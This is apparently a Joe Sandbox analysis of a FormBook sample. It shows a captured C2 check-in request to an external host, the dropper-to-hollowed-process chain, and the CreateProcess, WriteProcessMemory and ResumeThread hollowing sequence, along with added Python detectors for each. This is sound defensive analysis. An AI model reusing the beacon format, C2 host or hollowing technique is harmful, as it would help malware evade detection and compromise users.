                              Dec 2, 2024 15:55:27.961407900 CET1236INData Raw: 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e
                              Data Ascii: 4146341vw ,1.875rem)}}@supports not (margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-col
                              Dec 2, 2024 15:55:27.961471081 CET1236INData Raw: 31 36 20 33 32 32 2e 35 30 31 20 32 30 33 2e 33 38 20 33 35 39 2e 34 34 36 20 32 32 31 2e 31 32 43 33 39 36 2e 33 39 32 20 32 33 38 2e 38 35 39 20 34 30 34 2e 37 32 38 20 32 39 38 2e 32 35 36 20 33 37 38 2e 30 36 37 20 33 35 33 2e 37 38 36 43 33
                              Data Ascii: 16 322.501 203.38 359.446 221.12C396.392 238.859 404.728 298.256 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="
                              Dec 2, 2024 15:55:27.961560965 CET1236INData Raw: 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75
                              Data Ascii: /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="90" result="effect1_foregroundBlur_2001_5" /></filter></defs></svg><h1 class="win
                              Dec 2, 2024 15:55:27.961575985 CET1236INData Raw: 22 3e 0a 09 09 09 09 09 09 09 3c 65 6c 6c 69 70 73 65 20 63 78 3d 22 31 31 32 2e 35 33 34 22 20 63 79 3d 22 31 33 34 2e 32 39 39 22 20 72 78 3d 22 31 31 32 2e 35 33 34 22 20 72 79 3d 22 31 33 34 2e 32 39 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22
                              Data Ascii: "><ellipse cx="112.534" cy="134.299" rx="112.534" ry="134.299" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 379.183 586.577)" fill="#15B1F9" /></g><g opacity="0.8" filter="url(#filter1_f_2001_10)"><path
                              Dec 2, 2024 15:55:27.969588041 CET197INData Raw: 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 39 30 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 31
                              Data Ascii: /><feGaussianBlur stdDeviation="90" result="effect1_foregroundBlur_2001_10" /></filter></defs></svg></div></section></main></div></body></html>0
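The request in session 16 above has the shape FormBook uses for its check-in: a short single-segment path (/jt56/), a long base64 blob with unescaped '+' and '/' as the first query parameter, a four-character trailer parameter, an Android WebView User-Agent sent from a Windows host, and Connection: close. The Python below is an added example and not part of the Joe Sandbox report: it parses the captured request text (SAMPLE_REQUEST is reassembled from the session above), scores those traits, and compares against a constructed benign request. The BENIGN_REQUEST, the client_os argument and the threshold of three coinciding traits are assumptions of the example.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample: the GET request from session 16 above, reassembled as
# raw HTTP text exactly as the report prints it (request line and headers).
SAMPLE_REQUEST = (
    "GET /jt56/?cNeT5P=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wbQxw9SoOMJyFS7aCodBcGMHsrkiHFt0aNasFqY1YB+AO+7j098ky2tOd&l0W=Yh8P HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Host: www.supernutra01.online\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36\r\n"
    "\r\n"
)

# Constructed benign request, used as a control (assumption, not from the report).
BENIGN_REQUEST = (
    "GET /api/v1/items?page=2&sort=name HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n"
    "\r\n"
)


@dataclass
class Request:
    method: str
    target: str
    headers: dict


def parse_request(raw: str) -> Request:
    """Split a raw HTTP/1.1 request head into method, target and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers)


BASE64_CHARS = re.compile(r"[A-Za-z0-9+/]+=*")


def beacon_indicators(req: Request, client_os: str) -> list:
    """Names of the FormBook-style beacon traits present in req.

    client_os is the OS of the host that sent the request, as known from the
    sensor or asset inventory (here: the Windows analysis VM).
    """
    hits = []
    parts = urlsplit(req.target)

    # 1. A single short directory as the path (/jt56/), nothing after it.
    if re.fullmatch(r"/[a-z0-9]{2,8}/", parts.path):
        hits.append("short_dir_path")

    # 2. Exactly two query parameters: a long raw-base64 blob (unescaped '+' and '/'
    #    in a query string) followed by a short trailer. Split by hand so that
    #    '+' is not turned into a space the way parse_qs would.
    params = [p.split("=", 1) for p in parts.query.split("&") if p]
    if len(params) == 2 and all(len(p) == 2 for p in params):
        (_k1, v1), (k2, v2) = params
        if len(v1) >= 40 and BASE64_CHARS.fullmatch(v1) and ("+" in v1 or "/" in v1):
            hits.append("raw_base64_payload_param")
        if len(k2) <= 4 and len(v2) <= 6:
            hits.append("short_trailer_param")

    # 3. The User-Agent claims an Android WebView while the sender is a Windows host.
    ua = req.headers.get("user-agent", "")
    if client_os.lower().startswith("windows") and re.search(r"Android|Mobile Safari", ua):
        hits.append("ua_platform_mismatch")

    # 4. One request per TCP connection.
    if req.headers.get("connection", "").lower() == "close":
        hits.append("connection_close")

    return hits


def is_formbook_beacon(raw: str, client_os: str = "Windows", min_hits: int = 3) -> bool:
    """True when enough independent traits coincide on one request (threshold is an assumption)."""
    return len(beacon_indicators(parse_request(raw), client_os)) >= min_hits


if __name__ == "__main__":
    for raw in (SAMPLE_REQUEST, BENIGN_REQUEST):
        req = parse_request(raw)
        print(req.method, req.target[:40], beacon_indicators(req, "Windows"))
```

Scoring the request shape rather than the destination matters here: the reply is a generic FASTPANEL hosting page served behind Cloudflare with a 200, and the earlier session got a 405 from nginx, so neither response body identifies the server as a controller.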



                              Target ID:0
                              Start time:09:53:16
                              Start date:02/12/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs"
                              Imagebase:0x7ff644c80000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:09:53:31
                              Start date:02/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe"
                              Imagebase:0xa50000
                              File size:396'288 bytes
                              MD5 hash:5E4094C909CCCBA80D844F553391F9F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:09:53:42
                              Start date:02/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0x940000
                              File size:65'440 bytes
                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:09:53:52
                              Start date:02/12/2024
                              Path:C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe"
                              Imagebase:0xf60000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:false

                              Target ID:6
                              Start time:09:53:53
                              Start date:02/12/2024
                              Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                              Imagebase:0x690000
                              File size:340'992 bytes
                              MD5 hash:727FE964E574EEAF8917308FFF0880DE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Target ID:9
                              Start time:09:54:06
                              Start date:02/12/2024
                              Path:C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe"
                              Imagebase:0xf60000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:11
                              Start time:09:54:18
                              Start date:02/12/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff722870000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true
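The process table above gives the whole chain in start order: wscript.exe running the .vbs, a dropped PE in %TEMP%, RegAsm.exe started with an empty command line and carrying the FormBook Yara matches, a copy of the payload under a random 70-character directory in Program Files (x86), and the 32-bit SearchProtocolHost.exe that also matches the rules. The Python below is an added example and not part of the report: it replays that chain as Sysmon-style process-creation events and applies the host-side checks a detection engineer would derive from it. The pids, the parent/child links (ppid) and the benign RegAsm control (pid 201) are assumptions, because the table lists no parent field; the image paths and command lines are copied from it.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


RAND_DIR = "rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW"
PF86_EXE = "C:\\Program Files (x86)\\" + RAND_DIR + "\\IGcdoWhymz.exe"

# Constructed sample chain. Images and command lines are copied from the process
# table above; the pids and parent links (ppid) are assumptions inferred from the
# Target IDs, start order and the injection signatures in the summary, since the
# table itself carries no parent field.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "C:\\Windows\\explorer.exe", "explorer.exe"),
    ProcEvent(101, 100, "C:\\Windows\\System32\\wscript.exe",
              'C:\\Windows\\System32\\WScript.exe "C:\\Users\\user\\Desktop\\PO_1111101161.vbs"'),
    ProcEvent(102, 101, "C:\\Users\\user\\AppData\\Local\\Temp\\p_Cm7afCdw.exe",
              '"C:\\Users\\user~1\\AppData\\Local\\Temp\\p_Cm7afCdw.exe"'),
    ProcEvent(104, 102, "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
              '"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"'),
    ProcEvent(105, 104, PF86_EXE, '"' + PF86_EXE + '"'),
    ProcEvent(106, 105, "C:\\Windows\\SysWOW64\\SearchProtocolHost.exe",
              '"C:\\Windows\\SysWOW64\\SearchProtocolHost.exe"'),
    # Constructed benign control: RegAsm run with arguments (assumption, not in the report).
    ProcEvent(201, 200, "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
              "RegAsm.exe /codebase MyLib.dll"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# .NET framework utilities commonly launched empty-handed as hollowing targets.
DOTNET_UTILITIES = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# Program Files (x86)\<one long alphanumeric token>\<name>.exe: no vendor name, no spaces.
PF86_RANDOM = re.compile(r"^C:\\Program Files \(x86\)\\[A-Za-z0-9]{24,}\\[^\\]+\.exe$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the executable token (quoted or bare) in cmdline."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        parts = s.split(None, 1)
        rest = parts[1] if len(parts) > 1 else ""
    return rest.strip() != ""


def flag_events(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> names of the rules that fired for that process-creation event."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, List[str]] = {}
    for ev in events:
        parent: Optional[ProcEvent] = by_pid.get(ev.ppid)
        parent_img = parent.image.lower() if parent else ""
        reasons = []
        # Script host running a PE out of %TEMP% (the WScript dropper signature).
        if basename(parent_img) in SCRIPT_HOSTS and TEMP_DIR.search(ev.image):
            reasons.append("script_host_launched_temp_exe")
        # A .NET utility started with an empty command line: a shell waiting to be hollowed.
        if basename(ev.image) in DOTNET_UTILITIES and not has_arguments(ev.cmdline):
            reasons.append("dotnet_utility_no_args")
        # Copy under Program Files (x86) in a random-looking directory.
        if PF86_RANDOM.match(ev.image):
            reasons.append("random_dir_under_program_files_x86")
        # 32-bit system binary whose parent lives outside C:\Windows.
        if ev.image.lower().startswith("c:\\windows\\syswow64\\") and parent \
                and not parent_img.startswith("c:\\windows\\"):
            reasons.append("syswow64_binary_non_windows_parent")
        if reasons:
            findings[ev.pid] = reasons
    return findings


if __name__ == "__main__":
    by_pid = {e.pid: e for e in SAMPLE_EVENTS}
    for pid, reasons in flag_events(SAMPLE_EVENTS).items():
        print(pid, basename(by_pid[pid].image), reasons)
```

Each rule fires on a different link of the chain, so a single alert on RegAsm.exe with no arguments is enough to pivot to the parent in %TEMP% and the child under Program Files (x86) even when the Yara hits in memory are not available.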


                                Execution Graph

                                Execution Coverage:47.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:126
                                Total number of Limit Nodes:2
                                execution_graph 1925 1462af4 1926 1462b00 CreateProcessA 1925->1926 1928 1462e38 1926->1928 1775 1461ed0 1776 1461ef4 1775->1776 1777 1461fb9 1776->1777 1780 1462855 1776->1780 1800 1462441 1776->1800 1781 14624e1 1780->1781 1787 1462850 1781->1787 1820 14629c8 1781->1820 1824 14629d8 1781->1824 1782 14624f6 1828 1462fe0 1782->1828 1832 1462fd1 1782->1832 1783 14625ca 1836 14632df 1783->1836 1840 14632f0 1783->1840 1784 14627b0 1852 1463731 1784->1852 1858 1463740 1784->1858 1785 14627d1 1864 1463d70 1785->1864 1872 1463d60 1785->1872 1786 146264f 1844 14634c8 1786->1844 1848 14634b8 1786->1848 1787->1777 1801 1462483 1800->1801 1802 1462850 1801->1802 1816 14629c8 CreateProcessA 1801->1816 1817 14629d8 CreateProcessA 1801->1817 1802->1777 1802->1802 1803 14624f6 1810 1462fe0 Wow64SetThreadContext 1803->1810 1811 1462fd1 Wow64SetThreadContext 1803->1811 1804 14625ca 1818 14632f0 ReadProcessMemory 1804->1818 1819 14632df ReadProcessMemory 1804->1819 1805 146264f 1805->1805 1814 14634c8 VirtualAllocEx 1805->1814 1815 14634b8 VirtualAllocEx 1805->1815 1806 14627b0 1808 1463740 WriteProcessMemory 1806->1808 1809 1463731 WriteProcessMemory 1806->1809 1807 14627d1 1812 1463d60 3 API calls 1807->1812 1813 1463d70 3 API calls 1807->1813 1808->1807 1809->1807 1810->1804 1811->1804 1812->1802 1813->1802 1814->1806 1815->1806 1816->1803 1817->1803 1818->1805 1819->1805 1821 14629fc 1820->1821 1880 146076c 1821->1880 1825 14629fc 1824->1825 1826 146076c CreateProcessA 1825->1826 1827 1462a95 1826->1827 1827->1782 1830 1462ffc 1828->1830 1831 14630cf 1830->1831 1884 1460794 1830->1884 1831->1783 1833 1462fe0 1832->1833 1834 1460794 Wow64SetThreadContext 1833->1834 1835 14630cf 1833->1835 1834->1835 1835->1783 1837 1463317 1836->1837 1888 14607bc 1837->1888 1841 1463317 1840->1841 1842 14607bc ReadProcessMemory 1841->1842 1843 146336b 1842->1843 1843->1786 1845 14634ef 1844->1845 1892 14607d4 1845->1892 1847 146357c 1847->1784 1849 14634ef 
1848->1849 1850 14607d4 VirtualAllocEx 1849->1850 1851 146357c 1850->1851 1851->1784 1853 1463770 1852->1853 1896 14607ec 1853->1896 1855 1463836 1856 1463bf1 1855->1856 1857 14607ec WriteProcessMemory 1855->1857 1856->1785 1857->1855 1859 1463770 1858->1859 1860 14607ec WriteProcessMemory 1859->1860 1863 1463836 1860->1863 1861 1463bf1 1861->1785 1862 14607ec WriteProcessMemory 1862->1863 1863->1861 1863->1862 1865 1463d9d 1864->1865 1866 14607ec WriteProcessMemory 1865->1866 1867 1463e49 1866->1867 1867->1867 1871 1463f7b 1867->1871 1900 1460804 1867->1900 1870 1464028 1870->1787 1904 146081c 1871->1904 1873 1463d9d 1872->1873 1874 14607ec WriteProcessMemory 1873->1874 1875 1463e49 1874->1875 1877 1460804 Wow64SetThreadContext 1875->1877 1879 1463f7b 1875->1879 1876 146081c ResumeThread 1878 1464028 1876->1878 1877->1879 1878->1787 1879->1876 1881 1462b00 CreateProcessA 1880->1881 1883 1462e38 1881->1883 1885 14631d0 Wow64SetThreadContext 1884->1885 1887 1463293 1885->1887 1887->1831 1889 1463398 ReadProcessMemory 1888->1889 1891 146336b 1889->1891 1891->1786 1893 1463620 VirtualAllocEx 1892->1893 1895 14636de 1893->1895 1895->1847 1897 1463c18 WriteProcessMemory 1896->1897 1899 1463cff 1897->1899 1899->1855 1901 14631d0 Wow64SetThreadContext 1900->1901 1903 1463293 1901->1903 1903->1871 1905 14640b8 ResumeThread 1904->1905 1907 1464147 1905->1907 1907->1870 1908 1463c10 1909 1463c68 WriteProcessMemory 1908->1909 1911 1463cff 1909->1911 1916 1461ec0 1917 1461ef4 1916->1917 1918 1461fb9 1917->1918 1919 1462855 7 API calls 1917->1919 1920 1462441 7 API calls 1917->1920 1919->1918 1920->1918 1929 1463390 1930 1463398 ReadProcessMemory 1929->1930 1932 146345e 1930->1932 1933 14640b0 1934 14640b8 ResumeThread 1933->1934 1936 1464147 1934->1936 1912 1463618 1913 1463620 VirtualAllocEx 1912->1913 1915 14636de 1913->1915 1921 14631c8 1922 146321d Wow64SetThreadContext 1921->1922 1924 1463293 1922->1924
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8239c238b434e4f1e1106178513673af0aee106db576b677abade6a1dfc7ae95
                                • Instruction ID: ce948cb31a297cc27cdcd37bc02377c20b507b636602e1d14313e56dea24ba35
                                • Opcode Fuzzy Hash: 8239c238b434e4f1e1106178513673af0aee106db576b677abade6a1dfc7ae95
                                • Instruction Fuzzy Hash: 5B528378A00219CFDB64CF69D984B99BBF5FF49314F1481AAE909A7361D731AE81CF10
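The execution graph above reads as the standard hollowing sequence run by p_Cm7afCdw.exe against its child: CreateProcessA, Wow64SetThreadContext, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory (repeated), Wow64SetThreadContext, ResumeThread. The Python below is an added example and not part of the report: a stateful matcher over an API-call trace that raises a finding only when a ResumeThread is preceded by create, alloc, write and set-context calls from the same caller on the same target. The trace is constructed from the API names in the graph; its pids, the DEBUGGER_TRACE control and the Nt-level aliases in STAGE_OF_API are assumptions of the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class ApiCall:
    caller_pid: int
    api: str
    target_pid: int  # process the call acts on; for CreateProcess*, the child it produced


# Constructed trace. The API names and their order are taken from the execution
# graph above (CreateProcessA, Wow64SetThreadContext, ReadProcessMemory,
# VirtualAllocEx, WriteProcessMemory x3, Wow64SetThreadContext, ResumeThread).
# The pids are assumptions: the graph shows code addresses, not pids; 2 and 4 are
# used to mirror the report's Target IDs for p_Cm7afCdw.exe and RegAsm.exe.
SAMPLE_TRACE = [
    ApiCall(2, "CreateProcessA", 4),
    ApiCall(2, "Wow64SetThreadContext", 4),
    ApiCall(2, "ReadProcessMemory", 4),
    ApiCall(2, "VirtualAllocEx", 4),
    ApiCall(2, "WriteProcessMemory", 4),
    ApiCall(2, "WriteProcessMemory", 4),
    ApiCall(2, "WriteProcessMemory", 4),
    ApiCall(2, "Wow64SetThreadContext", 4),
    ApiCall(2, "ResumeThread", 4),
]

# Constructed control (assumption): a debugger-style parent that creates, inspects
# and resumes a child without ever writing into it.
DEBUGGER_TRACE = [
    ApiCall(7, "CreateProcessW", 8),
    ApiCall(7, "ReadProcessMemory", 8),
    ApiCall(7, "Wow64GetThreadContext", 8),
    ApiCall(7, "ResumeThread", 8),
]

# Normalise Win32 and Nt-level spellings of each stage (the Nt names are the
# example's own aliases; the report only shows the Win32 calls).
STAGE_OF_API = {
    "CreateProcessA": "create", "CreateProcessW": "create", "CreateProcessInternalW": "create",
    "NtUnmapViewOfSection": "unmap", "ZwUnmapViewOfSection": "unmap",
    "ReadProcessMemory": "read", "NtReadVirtualMemory": "read",
    "VirtualAllocEx": "alloc", "NtAllocateVirtualMemory": "alloc",
    "WriteProcessMemory": "write", "NtWriteVirtualMemory": "write",
    "SetThreadContext": "setctx", "Wow64SetThreadContext": "setctx", "NtSetContextThread": "setctx",
    "ResumeThread": "resume", "NtResumeThread": "resume",
}
# Stages that must all have been seen on the same (caller, target) before the resume.
REQUIRED_BEFORE_RESUME = frozenset({"create", "alloc", "write", "setctx"})


@dataclass(frozen=True)
class Finding:
    caller_pid: int
    target_pid: int
    stages: Tuple[str, ...]  # every stage observed, sorted, including optional read/unmap


def detect_hollowing(trace: List[ApiCall]) -> List[Finding]:
    """Report each (caller, target) pair whose ResumeThread follows create+alloc+write+setctx.

    The matcher is order-tolerant for the stages before the resume, because the
    sample sets the thread context both before and after writing the image, and
    it ignores unrelated calls interleaved with the chain.
    """
    seen: Dict[Tuple[int, int], Set[str]] = defaultdict(set)
    findings: List[Finding] = []
    for call in trace:
        stage = STAGE_OF_API.get(call.api)
        if stage is None:
            continue
        key = (call.caller_pid, call.target_pid)
        if stage != "resume":
            seen[key].add(stage)
            continue
        if REQUIRED_BEFORE_RESUME <= seen[key]:
            findings.append(Finding(key[0], key[1], tuple(sorted(seen[key]))))
        seen[key].clear()  # a resumed child starts a fresh chain
    return findings


if __name__ == "__main__":
    print(detect_hollowing(SAMPLE_TRACE))
    print(detect_hollowing(DEBUGGER_TRACE))
```

Keying on (caller, target) rather than on the caller alone is what keeps a debugger or a crash-handler parent, which also creates and resumes children, out of the findings: it never allocates in or writes to the child, so the required set is never complete.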

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 1462af4-1462ba3 3 1462c05-1462c30 0->3 4 1462ba5-1462bd5 0->4 7 1462c92-1462ceb 3->7 8 1462c32-1462c62 3->8 4->3 12 1462bd7-1462bdc 4->12 15 1462ced-1462d1a 7->15 16 1462d4a-1462e36 CreateProcessA 7->16 8->7 23 1462c64-1462c69 8->23 13 1462bde-1462be8 12->13 14 1462bff-1462c02 12->14 17 1462bec-1462bfb 13->17 18 1462bea 13->18 14->3 15->16 31 1462d1c-1462d21 15->31 39 1462e3f-1462f19 16->39 40 1462e38-1462e3e 16->40 17->17 20 1462bfd 17->20 18->17 20->14 24 1462c8c-1462c8f 23->24 25 1462c6b-1462c75 23->25 24->7 28 1462c77 25->28 29 1462c79-1462c88 25->29 28->29 29->29 30 1462c8a 29->30 30->24 33 1462d44-1462d47 31->33 34 1462d23-1462d2d 31->34 33->16 35 1462d31-1462d40 34->35 36 1462d2f 34->36 35->35 38 1462d42 35->38 36->35 38->33 51 1462f1b-1462f1f 39->51 52 1462f29-1462f2d 39->52 40->39 51->52 53 1462f21 51->53 54 1462f2f-1462f33 52->54 55 1462f3d-1462f41 52->55 53->52 54->55 56 1462f35 54->56 57 1462f43-1462f47 55->57 58 1462f51-1462f55 55->58 56->55 57->58 59 1462f49 57->59 60 1462f57-1462f80 58->60 61 1462f8b-1462f96 58->61 59->58 60->61 64 1462f97 61->64 64->64
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,00000000,00000000,03DB3588,03DB358C,01462A95,?,?,?), ref: 01462E23
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: a6af18bb4dbfb639d167b5d38851c9c284aa2b54b291eb797043ed7cca14ef28
                                • Instruction ID: 73323d377b7104fd58f09d8253115f8b2fd0fc9bdf0818f522e9084cf6f05c8b
                                • Opcode Fuzzy Hash: a6af18bb4dbfb639d167b5d38851c9c284aa2b54b291eb797043ed7cca14ef28
                                • Instruction Fuzzy Hash: 1DD14A70D002299FDB24CFA8C841BEEBBF5FB49304F0091AAD559B7250DBB49A85CF95

                                Control-flow Graph

                                • Executed
                                • Not Executed
